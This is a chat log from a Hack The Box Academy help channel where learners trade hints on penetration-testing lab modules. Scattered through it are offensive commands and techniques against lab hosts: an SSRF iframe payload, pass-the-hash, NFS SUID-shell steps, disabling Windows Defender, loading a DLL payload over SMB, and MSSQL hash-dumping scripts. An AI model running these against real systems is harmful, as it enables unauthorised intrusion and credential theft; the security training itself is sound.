Windows Privilege Escalation.
Other files - section
Using the techniques shown in this section, find the cleartext password for the bob_adm user on the target system.
I did search the entire packages folder, where in the module it's said to contain passwords (users likely store them there). Yet, I have found nothing. Any hints?
Has anyone done the "SSL/TLS Certificate Pinning Bypass" section of "Android Application Dynamic Analysis" module for help?
Is someone able to help me understand a question in Windows Event Logging Basics? the first question im getting confused on why we are looking at an event (8/3/2022 at 10:23:25) but the answer is in a different event (8/30/2022 10:23:49 AM:)?
Which module should be chosen after completing "introduction to active directory"?
New to HTB, looking for teammates to collaborate on labs via shared terminals. Anyone into web pentesting?
I miss the previous moderator ! he was active and really good with guiding students
yo guys im on AD enum, cross forest attacks from linux
im supposed to have credentials for the user wley, but theyre not mentioned in the section
Hi everyone, I've been stuck for 2 days on the Injection Attacks Skills Assessment (https://academy.hackthebox.com/module/204/section/2235) and I need some help.
I can't find any internal port that works through the SSRF. <iframe src="http://127.0.0.1:PORT/" width="800" height="500"> I'm pointing the SSRF to 127.0.0.1, and the only port that responds is 80, but the server response gives errors with external resources (fonts, CSS, JS), so the PDF doesn't even get generated.
I've tried all the common HTTP port wordlists from SecLists, and none of them worked. I'm completely stuck and would appreciate any guidance on how to proceed.
Thanks in advance.
have you tried modifying the error into 200 response via burpsuite?
Hello guys, I was studying bash scripting and I'm kind of stuck on this problem. Can I get your help https://academy.hackthebox.com/module/21/section/128 Thank for the help
@little belfry this is not the server and please , English only
Don't spoil content please @leaden island
didnt mean it sry
No worries
Look at this section: https://academy.hackthebox.com/module/143/section/1269
You can use the other user as well
yeah found it thanks
Hi all, need help with the following module 'https://academy.hackthebox.com/module/80/section/780'. It states to right click the request then select 'Do Intercept - Response to this request', however as you can see in my screenshot, i don't have this option. Can someone assist please?
you are clicking in the wrong area it should be on the requested page try right clicking in the bottom left portion
Thank you but i get the same options.
go to the intercept
I'm there, now what do i do please?
you have to intercept a request first
once you intercept the request you will be able to see a request in the right side
Aha! my bad, thank you!
like this
you can dm me
@prisma wing theres an entire module that covers burp and zap have you looked into it?
Thanks for the suggestion! I actually already tried that, and in my case the response is already 200 OK. The issue isn't the status code - it's that wkhtmltopdf can't load external resources (fonts, CSS, JS) from CDNs, so it ends with Exit with code 1 and the PDF doesn't get generated.
I think the problem might be the port, and I've tested many ports using common HTTP port wordlists, but I haven't found any that respond correctly. The only port that responds is 80, but it still gives the errors I mentioned above.
I believe it must be another port, but I need help figuring out which one works...
Got it thanks man!
No I haven't, I will deffo look into it though. Thanks man!
you should try a universal port scan as well , like literally all 65535 ports via nmap
I actually already tried scanning all 65535 ports, but it's not really viable in this lab. Each request goes through wkhtmltopdf to generate a PDF, and every PDF takes several seconds to process. Sending 65k requests would take days, and if done in parallel, the PDF generator would likely break.
This isn't about Nmap... I'm trying to connect to an internal service using SSRF with a payload like: <iframe src="http://127.0.0.1:PORT/" width="800" height="500">
There must be another way to solve this, since scanning all ports like that isn't practical. I'm completely stuck, I've tried everything, and I just can't figure it out.
That isn't an intercepted request; in your screenshot you are trying to perform the same action demonstrated in the section on intercepted request that already has a response. I gather this because you are in HTTP history and not using Intercept. Does this make sense? So intercept a request and hold it, then right-click and select the Do Intercept - Response to this request option.
In the skill assessment of File Upload Attacks, I uploaded a file name HTB.jpg, I should be able to access it through ||http://94.237.60.55:42617/contact/user_feedback_submissions/250822_HTB.jpg|| but the server just throw not found at me, can someone help?
UPDATE, I FOUND A WAY TO FIX IT BELOW.
Yes makes perfect sense thank you!
All of it didn't work man
Alright, thank you
I've just DM you
Can you check my DM, please. I encountered the same thing?
No
Any can help me?
I found ways to fix it
turns out you have to press this little button first before uploading
Then the file will appear after you press SUBMIT, anyone having the same problem in the Skill Assessment in File Upload Attacks - this is the way. Bye everybody
Hey y'all, my target doesn't want to connect via ssh and whenever I do try and connect to it via ssh I get "ssh: connect to host 10.129.219.235 port 22: No route to host"
when I try and ping it I get "From 10.10.14.1 icmp_seq=1 Destination Host Unreachable"
I am in the Find Files and Directories section of the Linux Fundamentals course, could someone please help me out? VPN is up and I launched the corresponding .ovpn file as well.
you can DM me
Try another VPN server
I have tried like 6 this morning. Issue has been ongoing since last night. ChatGPT says it's an issue on HTB side and / or it could be that the machine is retired which wouldn't make sense if the course is still available (to me anyways) and so I decided it would be best to come ask in here to confirm or deny that being the case.
I am willing to use PWNBOX but since I am a free account catching up on HTB to where I was on LetsDefend I need confirm it so I can dial in the next 2 hours and try and finish the course entirely.
I am using EU Academy 2 server currently, and I was able to connect without any problems.
I will try that rn
Ayyyy that worked!!!!
@brave field you da best
Thank you so much
I'm also facing the same issue. Have you resolved it?
Not in the intended way I guess. I found an article and then an exploit in Metasploit, exploiting exactly the same problem, but with model endpoint. Funny part that exploit was broken, so I fixed it and created a pull request. https://github.com/rapid7/metasploit-framework/pull/20489
I'm not totally sure where is the problem with given solution in article on the academy, but I tried with different YAML files, handlers, etc.
you can DM me
For module 'https://academy.hackthebox.com/module/80/section/781', i need to enumerate the admin id and it says to go back to the brute force attacks section but it does not explain how to enumerate the id of a user, only the usernames or passwords. How would i enumerate the id please?
I haven't taken the module but I'd wager a guess it teaches how to brute-force a parameter using a wordlist?~ so look at your own user id and generate a wordlist based on that
you can use burpsuite intruder
Thank you, i have tried already. This is what i've tried 'ffuf -w <(seq 1 1000) -u http://94.237.57.211:44565/index.php -X POST -H "Content-Type: application/x-www-form-urlencoded" -d "user_id=FUZZ&password=invalid" -fr "Unknown user"' something is obviously wrong but i do not know what
Thank you, i'm not experienced with this but i'll give it a go
probably that: <(seq 1 1000)
1: this is not how io directors work (the file dies before ffuf can read it)
2: It's probably easier to just do: seq 1 1000 > ids.txt
Thanks again but it's giving me the same output, not sure on this one
I'm just going to brute force the username and password, it'd be easier lol
Or <<< seq 1 1000
But to inject code it'd be $() not <()
Or `code here`
(The backtick method is more archaic)
Advanced XSS and CSRF Exploitation - any nudge on the back half of this skill assessment?
you can dm me
cool ty
hello, i am in Skills Assessment - Password Attacks and need some help/hint. i have initial foothold at DMZ01 i do not know after that and stuck.
You'll need to pivot
thank you i will try to do it.
I suggest ligolo-ng
okay, Thank you
What have you tried so far and where did you get stuck at the moment?
Hello i'm trying to complete the "Attacking Thick Client Applications" module searching for the credentials, but when i'm about to launch the "monta.ps1" script with powershell, i got this error in CLI "System.Management.Automation.Runspaces.InitialSessionState' threw an exception." . Seems i can not launch powershell at all. NO CLI.
Can someone help me?
Thank you in advice.
I'm trying to do the Vulnerability Assessment with Nessus, but can't get Nessus to run on the HTB Workstation. I don't have permissions to install, so I can't figure out what I'm doing wrong...
I am trying to use VirtualBox to get it to work now.
Oh I've solved this, Thanks!
Thank you so much for your help. I have also tried different YAML and handlers, but I am still getting the same error.
You shouldn't have to install anything just navigate to https://10.129.xxx.xxx:8834 with a browser.
Don't I have to start the nessus service first? It won't let me do that. When I try to navigate to the ip:port, it says "Connection has timed out".
You can DM what you are seeing on your end, but no, from what I recall it should already be running.
Try :8834
I would reset your target and try it again.
Ok. I'll try that. Even on my VirtualBox, it scans for a few seconds and gives blank reports.
You shouldn't have to scan anything either.
Ok. So, it's a saved scan when I login with the provided creds?
It mentions if you don't want to wait for scan data it is available.
Right. I just wasn't sure cause I haven't gotten that far. lol
I tried to install it and it said that I didn't have permission?
I'll try again.
I just spun it up and went straight to the UI
Just had to accept the cert. Using off the shelf kali with VMware. I'm on us-academy-3
That's odd.
Ok. It let me install it that time. idk what I did different. lol
Used curl instead of just downloading from the browser...
Which section are you working on? Can you drop a link?
Ok and you are using your VM right?
I'm trying both ways. The pwnbox wasn't letting me install before, so I went to VirtualBox, but that wasn't doing the scanning, so I went back to pwnbox.
Ok, so make sure you only have one up at any given time as they use the same IP.
You do not need to install nessus, as the target is the nessus instance.
This is a Tier 0 you guys can keep going here unless you want to take it to DMs.
The more the merrier. lol
I've tried using "localhost" too.
I got it!
Well, YOU got it. lol
Thank you!
This has been driving me crazy for the last week! lol
I appreciate you both! π
Hello ? The command netexec smb <ip/24> -u Administrator -d . -H <hash_value> is the same with the command netexec smb <ip/24> -u Administrator -H <hash_value> --local-auth?
Hi, is there anyone who solved Applications of AI in InfoSec skill assessment. Long time here many tries but no result. Any working hint?
I tried many variations of the code, but the answer is still the same: "Your model accuracy is 0.0. Please improve it to at least 90% to receive the flag."
Yes, both commands are functionally the same - they both attempt local auth with the given hash.
Some people prefer -d . because it's shorthand and works in CME (legacy habit).
Others prefer --local-auth because it's explicit and avoids confusion when you're mixing domain + local checks in the same engagement.
@cunning canopy @gray yacht I got done with the Nessus Assessment! It was fairly simple after I got into Nessus. The only problem I had after connection is that it kept timing out and I had to refresh it after a few minutes. It probably happened 3-4 times, but that's all that slowed me down. Thank you both, again!
@gray yacht can you check DM
Hey guys please I need help from anyone who finished the Introduction to bash scripting module
Windows Privilege Escalation Pillaging
Log in as Grace and find the cookies for the slacktestapp.com website. Use the cookie to log in into slacktestapp.com from a browser within the RDP session and submit the flag.
I press the save button in Firefox cookie menu after pasting content before refreshing but I'm not getting a change in the page itself.
Hello there, anyone out there has done the Introduction to Deserialization Attacks assessment 2?
I have the ping working, but I don't get the callback, I already tried a lot of bypass for the blacklist
I maybe able to help you
You can DM me for help. I only have a few mins before i log off though
guys i started the Linux Privilege Escalation module and on the very first question where i have to connect via ssh the whole thing lags and im not able to perform any commands the whole thing just freezes any idea how to fix it ?
Try resetting the machine?
Ty
i did many times also changed the vpn file a couple of times
Anyone have any success with DACL II Skills assessment?
if anybody could help em out and take a look at my community help zone question it would be greatly appreciated
Is this related to a module?
you didn't input a host/ip to connect to
If your question is related to a module you should just ask it here.
i did
no you didn't
how do i start hacking?
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
hi
Module: Windows Privilege Escalation
Section: Citrix Break Out
Section Link: https://academy.hackthebox.com/module/67/section/2502
its windows machine , but when i connect to RDP it give linux machine , what's now ?
Did you follow the instructions?
no , which instruction u mean ?
read the section again
Hello friendly hackers, I am having trouble with the Skills Assessment for CrackMapExec Module
Section link: https://academy.hackthebox.com/module/84/section/1747
Qn 4: Read the flag from the shared folder Ccache.
May I know if anyone can point me in the correct direction?
you can DM me
Hello guys, I am doing this Linux Enum module for CPTS. today when i tried to ssh to the target it is denying to connect. It will be helpful if someone could help me out.
Im connected to the vpn, the target machine is also pingable. But when i try to ssh, it says Connection refused by target.
Module Name: Linux Privilege Escalation
sorry, which module and section?
Module Name: Linux Privilege Escalation
Section: Environment Enumeration
hello guys i'm doing windows fundamental module i'm at the last exercise when i get the SID of the users and the group I created the answer is refused
You should be able to ssh in. What was your ssh command?
ssh htb-student@<ip>
what's the ip
i check the target in nmap, it shows ssh as open port.
ssh htb-student@10.129.205.110
probably try restarting the target
It's the wrong answer if it doesn't accept it
I have done it several times.
try changing vpn regions
Okayy!! let me check
Yeah I sorted it out
Currently having some issues/confusion in the Windows Lateral Movement > Windows Server Update Services (WSUS) module. Anyone know if RDP to DC01 should work from start? It worked once for me then I reset the lab to do second question and now its not. And I seem to need it to install updates...
You can dm me if you still need help
sorry bro
@trail ingot generally speaking; sharing details of a company you're doing a pentest of is highly unethical at best. also: this isn't an lfg server
are you sure you set the LHOST properly? (make sure you check the interfaces line up)
yes i am sure i rechecked again twice and also checked that the file is .war only
so you're using the 172 ip?
should i skip host-1 for now and go for host-2 first ? @fathom pendant
yes || 172.16.1.5 for lhost ||
you shouldn't have to skip it, but i'd use a higher port number to be sure, maybe it's not able to open/bind that port
i have also tried 4444 default
i also assume you launched the war file after uploading it
(navigate to the launched page)
it deployed on its own
it's not gonna automagically run until you call the webpage
i relaunched it tho because it was taking so long
i'm also assuming you have a listener waiting for the call
did you navigate to (click on) the directory /hell?
i have it on msfconsole only , exploit/multi/handler and i made sure to set the correct payload too
OH NO I DIDNT MY BAD
so sorry i took so much of your time i didn't know i had to do that
3...2...1... 
i thought it was running because it was deployed
deleting the og message because it's spoiling content (even though you used spoiler text, spoiler text really doesn't do anything)
thankyou very much @fathom pendant , also can you nudge me how could we find the creds given in hint on our own ? like i had to look up the hint for the creds
did you take a look at the desktop of the jump host you're given? 
guys i started the Linux Privilege Escalation module and on the very first question where i have to connect via ssh the whole thing lags and im not able to perform any commands the whole thing just freeze any idea how to fix it ?
i restarted the machine several times and changes the vpn file a couple of times but still its freezing on commands and on login aswell
user@debian:~$ sudo ssh htb-student@10.129.205.110
[sudo] password for user:
htb-student@10.129.205.110's password:
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-148-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
reach out to support, also don't know why you're doing sudo ssh
i did i didnt see the specific creds given in the hint, i saw many documentations tho, i didnt read all of them but glided through a few
where can i contact support ?
the jump host is the initial host you rdp into (or ssh, i forget if you can do that for this one)
Need some help? Learn how to reach the support team on Academy.
thanks
are you sure the username wordlist is correct which you're supposed to use ?
https://academy.hackthebox.com/module/296/section/3404
What type of attack was being used to escalate the privileges in the above example? (Format: two words)
module locked :cannot see
Have this exact issue. Found it?
I need a small help with an additional/optional exercise in Cracking Passwords with Hashcat,
You are conducting a penetration test for your client Inlanefreight and have Responder log data from the tool running overnight. You obtained the NTLMv2 password hash for the adconnectsvc user but all attempts to crack it have been unsuccessful. Recently, however, you read about another method to obtain something usable when you have an NTLMv2 password hash. Checking the project files from the previous year you also have the last NTDS dump to work with. Using Hashcat, find a way that you can leverage the NTLMv2 hash to authenticate as this user within the domain. Submit this string as your answer. Download the file "hashcat_addtnl_exercise.zip" from optional resources to get started.
Can i attach the .log and NTDS file?
Just need a small hint
you cannot, since the module is above tier0
Anyone? If someone's done it, just need a small hint :'(
When the password attacks module talks about this section:
A salt is not a secret value - when a system goes to check an authentication request, it needs to know what salt was used so that it can check if the password hash matches. For this reason, salts are typically prepended to corresponding hashes. The reason this technique works against rainbow tables is that even if the correct password has been mapped, the combination of salt and password has likely not (especially if the salt contains non-printable characters). To make rainbow tables effective again, an attacker would need to update their mapping to account for every possible salt. A salt consisting of just one single byte would mean the 15 billion entries from before would have to be 3.84 trillion (factor of 256).
Are they saying salts are used to prevent previously known/leaked/crack(unsalted, reused) passwords from being usable on the service?
If not, then im failing to understand how salting passwords doesnt require a table of salts to be needed to verify the password? application still has to keep up with a unique salt for each password... which seems adding little extra security for a lot of extra overhead?
you don't necessarily need a unique salt for each password, or the generated salt isn't a secret method
oh wait i think it clicked... the application doesnt store the password? it stores the salt and a hash of the salt + password then checks that?
ok i think i get it now. if your database of creds is leaked its only SLIGHTLY better than storing the password hash because you still have to store the salt alongside the password hash. but i guess its better than nothing?
Hello, could anyone please help me to deal with my ctf challenge (pwn). I'm a newbie and honestly i have tried to solve it for 6h long
it's a program. it works like u insert your name and your birthday. it will told you the flag if you insert the same as they want or they wont give u
it's told that we must know/use shellcode
but idk how to
Not sure man, we solve htb boxes which are kinda like ctfs, and other challenges here. Consider switching gears and doing a box
this channel/server isn't for random challenges/ctfs
Hi
sorry, can u tell me which channel is pls
if it's a challenge on the htb platform; read and follow the instructions in #welcome to access #challenges
do i need to echo -n or something? i know theres a trick sometimes where you have to do something to get rid of extra lines or spaces?
Hi folks
Is there any guide about how to create machines? (I mean, not the guide about how to submit machines, but how to actually create one)
echo adds a newline at the end of the line by default, with echo -n you can disable this trailing newline. If you want to compute a hash of a string you need to add the -n otherwise you will compute the hash of <your_string>\n.
thanks. im still having problems, i dont understand what im doing wrong, chatgpt told me that echo '...' is not the same as echo "..." | .. so i'd need to use single quotes for the backticks im not sure if they're even required this is silly
i still dont know if the ? is necessary or not
Hi guys I just purchased silver annual
Today and my goal is cpts
From 0 to hero and what path before pentesting path is suggested to take ?
Are you totally new? take the zero to hero stuff then take the intro to cybersecurity or whatever thats called then take the cpts
I mean I have net+,sec+,pen+ then I'm already halfway through ejpt and I know basic linux privesc and pentesting stuff
Yeah I know basic stuff with burp like turbo repeater for rc, repeater for uk multiple times response analysis then one more function which is used to fuzzing and idk how to use curl to the fullest tho
I did some labs on port swig academy but not good coder or web sec expert tho
sounds like you've got a handle on things. I feel like you'd be ok starting CPTS since thats what you came here to do
You can consider I have 0 coding
it wouldnt hurt to browse thru the intro to cyber sections or whatever its called
That's the main problem
i actually picked up some good info from that module too just because it was available
i think it was free when i did it
there's always little nuggets of golden info to gather all over these paths or modules or whatever but you prob be alright just starting the cpts.
I think I can access everything till tier two which covers what you said doesn't it?
i believe so
Then I'll do the junior cyber analyst path first which is their newest cert
That is the basic one which I could find on website please do share the fundamentals path link that you used
i think its called information security foundations in the paths sections
Gonna have to move laterally.
oh ok! So its not on the initial host?
hy
If you don't see it there, then I would see if that user can move laterally, as it may be in their home directory on a different host.
aaah, makes sense. Need to fire that lab up again and try. Thanks a lot!
Hi! Someone in Attacking AI - Application and System?
Is anyone facing a problem using droopescan?
Hello may i dm you i want to talk about silver annually
Hi Im stuck on the NTLM Relay Attacks Assessment QN4 after getting QN3 so is there anyone that can DM me about hints to get through this qn?
Of course man always brother
i have send the message thank you!
Not sure if this is the best place to ask (and I probably just missed something obvious). But how do I copy to/from the in browser attack box?
Evening gents
can you explain a little bit more
Hello, I am stuck on Active Directory Enumeration & Attacks module - Credentialed Enumeration from Windows. I am trying to answer the first question, I feed it the amount of kerberoastable users I could query from bloodhound, but no numbers are correct (I get only one user). And for some reason results are different with SharpHound.exe 2.7.1 (it shows less users than with Sharphound 1.0.3), why?
How about this: what are the steps you take to copy a flag from the attack vm into the answer box? (Copying IPs in would be nice, but they seem to be 10.128.8x.c, so whatever)
select that text ...press ctrl+shift+c
then go to browser paste simple with ctrl+v
Uh if that's it, I do feel dumb - thanks (hope that is it too)
np
everyone learns from somewhere
is there an Sysreptor module ?
not sure if you figured it out or if anyone else has issues this worked for me
sudo timedatectl set-ntp off
sudo rdate -n ip address
https://academy.hackthebox.com/module/67/section/630
task : Using the techniques in this section obtain the cleartext credentials for the SCCM_SVC user.
we don't have write permission in share , what to do ? or i doing something wrong ?
not on HTB Academy
you dont need write permission to read something...for that only read perms will be enough
if you want to upload something to that share then you need write permissions
Hello, I am stuck at Blacklist filters section of File Uploads Attack module. i fuzzed extensions and found few extensions like .php3, .php4 but .phtml wasn't allowed like they showed in HTB reading but anyways i uploaded shell.php4 but when i visit the url to cat the flag. webshell is not working page is completely blank i viewed page source and getting my whole php code back. i have created a detailed note of what i have done till now but since i think i am 90% there this detailed steps might be looked like walkthrough so if someone have already done this module or guiding me right now. i might paste here and once you read it i'll delete it afterwards so it did not provide any spoilers/walkthrough for upcoming users
you doing all good...the file you are uploading to get webshell...change it code to directly get reverse shell on you listener...in this way you will get rev shell on the listener on your kali ...easily cat
try this
ok let me try this and can you quick what i have done till now , or should use this phpbash and listner method first then talk. i mean htb didn't showed this method. ik this is also one of ways to get a reverse shell but i want to know what i am doing wrong this whole time.
@opal shuttle i think i should try the above method first
you are not doing wrong...just multiple ways
and each has their own pros and cons
in rev shell module they teach this i guess
not sure
yeah you are right. but why this method isn't working(there could be a important lesson or mistake that i can learn)
they do
dont know
but webshell has some limitations
so its better to get a rev shell and try there
if its not working
@woven storm lets move to dm
Module Name
Linux Privilege Escalation
Section Name
Miscellaneous Techniques
Question you're struggling with
Review the NFS server's export list and find a directory holding a flag.
Generally what you've tried (while avoiding spoilers, i.e. logged in as j and couldn't find anything)
I ssh'd into the target server, then immediately ran the following commands with the following output:
htb-student@NIX02:~$ cat /etc/exports
..SNIP..
/var/nfs/general *(rw,no_root_squash)
/tmp *(rw,no_root_squash)
htb-student@NIX02:~$ ls /var/nfs/general
exports_flag.txt
htb-student@NIX02:~$ cat /var/nfs/general/exports_flag.txt
<flag>
My problem
I don't know how I'm actually supposed to mount the filesystem and solve the challenge.
yeah thank you
ummm...i havent done that yet
but i guess chatgpt will help you out with that
for quick help ..if you want immediate help
I don't want immediate help, I just want to understand how to exploit this particular misconfiguration. Specifically, there are some commands in the section I don't understand:
root@Pwnbox:~$ sudo mount -t nfs 10.129.2.12:/tmp /mnt
root@Pwnbox:~$ cp shell /mnt
root@Pwnbox:~$ chmod u+s /mnt/shell
I don't understand where I am supposed to run these commands.
On your own machine it will mount it as root you place the file as root with suid and execute it on the target.
Because it is root and suid
So the NFS is mounted to my local virtual machine or htb's box?
hey guys, is nibbler broken? NOTHING works for me, i tried following the module but i cannot escalate the privileges whatever I do
That's pretty clever.
its getting a bit frustrating cuz its like the 3rd time im trying to do it and Im not sure if I am doing something wrong? executing the ||monitor.sh|| throws errors and it doesnt do a thing
jfc now even the port listening doesnt work 
The attacker box.
Hi, I made a little python script to correctly encode gopher request for SSRF section in module - Server-side Attacks, can I share it on github?
Yeah that's fine
cool, thank you
no, but write HTB to throw it in as an idea.
What would you expect from such a module?
Can you check DM?
Currently doing DACL Attacks II skills assessment and this is the hint for the last question || Search for rights in non-common locations where you can control everything. || Tried looking at ldap attributes - curious if anyone might have any input
same path, are you working on the Skills Assessment?
Everyone. I needed a little help. I want to create a payload for my android 8 to test it. Can you guys please help. I'm not a full beginner but a small help is appreciated.
This has nothing to do with modules please read the rules and follow the instructions in #welcome to gain access to a more appropriate channel
I need some help with windows lateral movement- skills assessment Q5, finding the password for VNC.
Hello everyone, I know I'm not in the right place. There's something I don't quite understand. I validated my Discord account for HTB, but the bot command returns an error. Why?
DM me
You can DM what you know.
I'd focus on trying to leverage WSUS.
No. Im stuck in Rogue Actions. Can DM to you?
Ah, thx! Got it
i found the ftp transfered file called flag but thats not the flag, or else we didnt watch the same transformer movies
found it, this question was using the attached file whereas the tutorial was on the live data
By tutorial, are you referring to the guide provided with annual? If so, sharing information from that is generally against ToS
I have the same error, I change the yaml a couple of times and still get error. you solve it?
by tutorial i'm referring to the text that you have to read to learn stuff, like here: https://academy.hackthebox.com/module/229/section/2445 (an example) In my case, i thought that both challenges were based on the live data that we capture in the tutorial from our pwnbox. But it turns out only the second question was that way...
Its still a tier 2 module so sharing info from the modules is still spoilers
which info
But yeah, sometimes it can be captured, and sometimes its in the given data
If the info is directly from the reading, its a spoiler still
Module: Pivoting, Tunneling, And Port Forwarding
Section: RDP and SOCKS Tunneling with SocksOverRDP
Question:
This section talks about loading a plugin named SocksOverRDP-x64.dll using regsvr32.exe
But, the file SocksOverRDP-x64.dll is being deleted by Windows Defender.
How am I supposed to finish this?
Edit: solved, I had to run
Set-MpPreference -DisableRealtimeMonitoring $true
before doing it
Module: Pivoting, Tunneling, And Port Forwarding
Section: Skill Assessment
Question: Submit the contents of C:\Flag.txt located on the Domain Controller.
I do see the IP of the DC, but none of the credentials I found is working, also RDP with mstsc.exe doesn't work.
I tried winrm since port 5985 is open but that also didn't work.
Any nudges?
perhaps you're already at the last stop; look around with the access you have
I am at the last stop, but couldn't find the way to DC
perhaps you already have some access to the DC
Module: MSSQL, Exchange, and SCCM Attacks
Section: Skills Assessment
Can someone confirm that we can authenticate on any of the MSSQL database (DB01 or DB02)? I tried a lot of differents credentials and I can't connect to to either of them
Can someone give me a nudge on Module "Windows Lateral Movement" Skills Assessment #2 question? I've been stuck for 2 days straight and I highly appreciate if someone can help! Thank you in advance
Sir I have a question regarding wordpress based attack can I put my query here?
Which module are you working in?
is there someone can help me with wifi pentesting and decode cap, hash
give me a module is there someone can help me with wifi pentesting and decode cap, hash
Not hack the box platform , from vulnhub
Then best to ask in #vulnlab
If you have no access, read and follow #welcome
ok
There are multiple wifi modules. Soon there will be a wireless red teamer job role path. Give it a few more months.
i would like come upon it
Perhaps also a mobile pentester path, together with the Android modules.
That may be a thing too. Hopefully they'll be iphone hacking modules tho it's likely that part won't happen. I say it might because mobile hacking lab has material on hacking iphones.
So it's not totally out of the question for htb to have it
And offsec has macos malware certification so macos hacking pathways are not out of the question either.
I think altho its not the most likely thing
But imo an iphone and android mobile pentesting path would be perfect
Or even ipad
Windows Privilege Escalation -> Print Operators
how i'm supposed to use UACme to see the full list of privileges ?
I'm currently reviewing the Active Directory Enumeration & Attacks.
At Credentialed Enumeration - from Windows, the first question says Using Bloodhound, determine how many Kerberoastable accounts exist within the INLANEFREIGHT domain. (Submit the number as the answer).
Using the latest BloodHound CE, it gives me 12 Kerberoastable accounts, but the answer I have used in the past when doing this module is || 13 || and it appears to be the correct answer somehow
Is that a mistake in the module or what?
Hi guys, I am currently doing Password Attacks - Pass the Hash (PtH). I am stuck at getting David's NTLM/RC4. I have RDP into the machine and use mimikatz with sekurlsa::logonpasswords but it doesnt show David's hash or user with david. Is there something I have missed out?
Maybe has to do something with the krbtgt account
Can anyone nudge me on the ||xpath injection ||part in the final skills assessment of Injection Attacks module from CWEE path
?
you can DM me
Hi. I'm trying to finish the file upload: blacklist filters module on HTB Academy CWEE, and I would like to ask a general burpsuite question.
I know for a fact that the .phps , .php, and .php5 extension are blacklisted (see fig 1), but why does intruder show the response as successful (a 201 success response) ? (see fig_2.1 and 2.2).
Should I assume that the application is using non standard HTTP responses?
Both, the repeater and the intruder show a 200 status code. Just the response body is different, most likely due to the encoding in the filename.
The 201 is the time it took the application to respond in ms.
Which version of SharpHound.exe did you use?
after some searching i was able to download and compile it and i moved it to the windows host but didn't seems to work i tried different keys or options with akagi64.exe but nothing worked
In DACL Attacks II "Shadow Credentials section is this a typo? Shouldn't it be Jeffry's? Couldn't find any path forward with Gabriel's credentials.
Authenticate to (ACADEMY-DACL02-DC01) with user "gabriel" and password "Godisgood001"
- 2 Compromise the account PCTEST001 and read the flag located at \LAB-DC\PCSHARES\pcflag.txt
Yes, that is correct.
The one that was in the \Tools in the windows machine itself.
Idk which version it was exactly tbh
I have a question about purchasing a tier 4 module. If this module is later transferred to tier 3, will I get 500 cubes back?
Yes, at least that's how it has been handled so far.
thx
hey guys, im using parrot vm and i cant seem to install smbclient, what do I have to do to install it?
I need it for dancing:/
In module https://academy.hackthebox.com/module/144/section/1255
How do I know what the dns server is to do the zone transfer against.
Or which dns server to use ?
It is the target ip feeling 😵‍💫
Is anyone working through the latest AI Red Teamer module? Attacking application and system components?
I think the Rogue Actions lab is bugged, I can't get it to work for the life of me. Maybe it's a skill issue. Anyone in the same boat?
Getting started - service scanning module
Anyone know why when i try run an smbclient scan i receive this error
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
users Disk
IPC$ IPC IPC Service (gs-svcscan server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.
smbXcli_negprot_smb1_done: No compatible protocol selected by server.
protocol negotiation failed: NT_STATUS_INVALID_NETWORK_RESPONSE
Unable to connect with SMB1 -- no workgroup available
it lists the shares however seems to crash after
It's probably server side but as long as it's listing all shares before the error then it should be fine.
Try another smb enumeration tool if the problem persists and it's annoying.
ah ok ty well the thing is
do_connect: Connection to failed (Error NT_STATUS_NOT_FOUND)
I also receive this when trying to log in to the share with the specified username and password, do you think that could be server issue as well or i just need to try harder haha
Remove the extra backslashes that's probably the problem now: \\ip\share
ahh ok ty ❤️
i was following the module and it was using \\ so thats what i thought was needed and i researched it & apparently its because powershell treats it as an escape character
It's 1.0.3. Shockingly, I tried with the latest one 2.7.1 on BloodHound-CE and it just shows one account.
LOL
it's only \\\\ if you're using bash terminal, not powershell -- which handles the \\ differently
negative aura for using powershell on linux
Do try it on your own too and see if that's the case or not. I even did -c All option and the users were missing, which is weird.
hello everyone i am doing the footprinting module at the point of mssql
i wanna use an nmap scan with the scripts i try to copy the command given by the module but i keep running into error for the script and i am not sure on how to get the necessary info in another way
can you screenshot of the error you are getting and of the command you are running
that is tier 2 i think go in dm probably
@harsh sundial if u think there is no other without revealing much, you can dm me
lmao alright tysm for clarifying haha
What errors are you running into specifically?
Hi, I think there is mistake in Citrix Breakout of Windows Privilege Escalation module
in Accessing SMB share from restricted environment part, it is expected to run
root@ubuntu:/home/htb-student/Tools# smbserver.py -smb2support share $(pwd)
but there is no smbserver.py there
an error concerning an iterator in the script
Can you share the exact error here for us?
sudo nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 10.129.76.101
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-08-24 16:11 CEST
Nmap scan report for 10.129.76.101
Host is up (0.031s latency).
PORT STATE SERVICE VERSION
1433/tcp open ms-sql-s Microsoft SQL Server 2019
|_ms-sql-xp-cmdshell: ERROR: Script execution failed (use -d to debug)
|_ms-sql-config: ERROR: Script execution failed (use -d to debug)
|_ms-sql-dump-hashes: ERROR: Script execution failed (use -d to debug)
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
|_ms-sql-tables: ERROR: Script execution failed (use -d to debug)
|_ms-sql-dac: ERROR: Script execution failed (use -d to debug)
|_ms-sql-ntlm-info: ERROR: Script execution failed (use -d to debug)
|_ms-sql-empty-password: ERROR: Script execution failed (use -d to debug)
|_ms-sql-hasdbaccess: ERROR: Script execution failed (use -d to debug)
Try sudo nmap --script-updatedb and then try running the command again.
yea still no solution might just be a problem with my wsl machine?
but i am curious because it was a smooth workflow upto this point
ChatGPT is saying it's a WSL issue. It does give a workaround but I don't know if it'll work or not.
oh okay i will also check with ai then
i would recommend installing kali in vmware instead of wsl
Windows Privilege Escalation Windows Server
My meterpreter sessions does not start after I run the rundll32.exe \\localip\tXWM\test.dll,0 command on RDP
hello all
I was exploring attacking applications with ffuf and web fuzzing, because one is part of BBH and one will be later, so I found no big difference except api fuzzing, am i missing out something?
